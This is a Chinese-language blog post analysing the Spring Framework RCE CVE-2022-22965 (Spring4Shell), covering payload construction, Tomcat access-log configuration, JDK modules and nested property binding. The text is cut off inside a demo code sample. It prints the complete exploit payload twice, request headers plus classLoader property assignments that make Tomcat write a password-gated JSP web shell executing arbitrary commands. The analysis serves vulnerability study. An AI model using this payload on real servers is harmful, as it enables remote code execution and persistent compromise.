Spring Framework RCE CVE-2022-22965 漏洞分析

2023年3月12日20:31:11已关闭评论36 views字数 7919阅读26分23秒阅读模式

摘要

本文会从几个角度分析漏洞CVE-2022-22965，首先会从payload的构造。每次我都喜欢先分析漏洞的payload，不得不承认实力没达到可以直接分析漏洞地步。所以会先看看payload的构造过程看看，每次学习和分析漏洞的payload能学到很多有趣的角度和想法。从payload的构造分析，分析payload的构造能够站在挖掘者的角度思考一个sink点，应该如何去寻找一条data-flow-path，并且能够满足流向sink的path。其次会结合SPA知识，call-graph分析部分功能点，最后会分析一波漏洞的修复方案。

Payload 构造

下面是本次RCE的payload，看上去并不是很难的样子。其中蕴藏了几个小知识点，下面逐一分析。首先大体看payload是由请求头和请求体两部分组成。

```
headers = {
"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
}

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```

知识点–Tomcat Access Log

在Tomcat的conf目录下的server.xml文件中配置了访问日志文件，

 <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" prefix="localhost_access_log" suffix=".txt" pattern="%h %l %u %t "%r" %s %b" />

className="org.apache.catalina.valves.AccessLogValve"对应设置日志文件的日志规范类，控制日志文件的文件名、文件后缀和日志输出格式等信息。这里我们就大致理解payload中的suffix、prefix和pattern的作用了。

%{}i在payload中有这个格式，查阅tomcat相关资料可以发现这里的 %{}i是以 Apache HTTP 服务器日志配置语法为模型，支持写入传入或传出标头，Cookie，会话或请求属性以及特殊时间戳格式的信息。

这里也就解释了请求包中有特殊的几个header，以及其作用。我们现在可以将payload进行转化一下，也就等同于下面了这段payload。

```
class.module.classLoader.resources.context.parent.pipeline.first.pattern=<% if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %>//
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

```

知识点—JDK module模块

JDK9引入了一个新的特性叫做JPMS（Java Platform Module System），也可以叫做Project Jigsaw。模块化的本质就是将一个大型的项目拆分成为一个一个的模块，每个模块都是独立的单元，并且不同的模块之间可以互相引用和调用。

引入module之后，原本被修复的漏洞就使用module特性进行绕过了。

知识点—AbstractNestablePropertyAccessor嵌套结构

为了理解payload为什么会有这么长 class.module.classLoader.resources.context.parent.pipeline.first.suffix，这里得理解AbstractNestablePropertyAccessor的嵌套结构。为了帮助读者更好理解嵌套结构，笔者写了一段代码作为演示。

public class School { String name; Student student; // TODO 添加setter和getter方法 public static class Student { String name; Age age; // TODO 添加setter和getter方法 } public static class Age { int age; // TODO 添加setter和getter方法 } // 为了代码量变少点，这里删除setter和getter方法，如果使用自行添加。 }

对应输出代码，demo类源码参考struts-tester/struts-tester.jsp

```
public static void main(String[] args) throws Exception {
java.util.HashSet set = new java.util.HashSet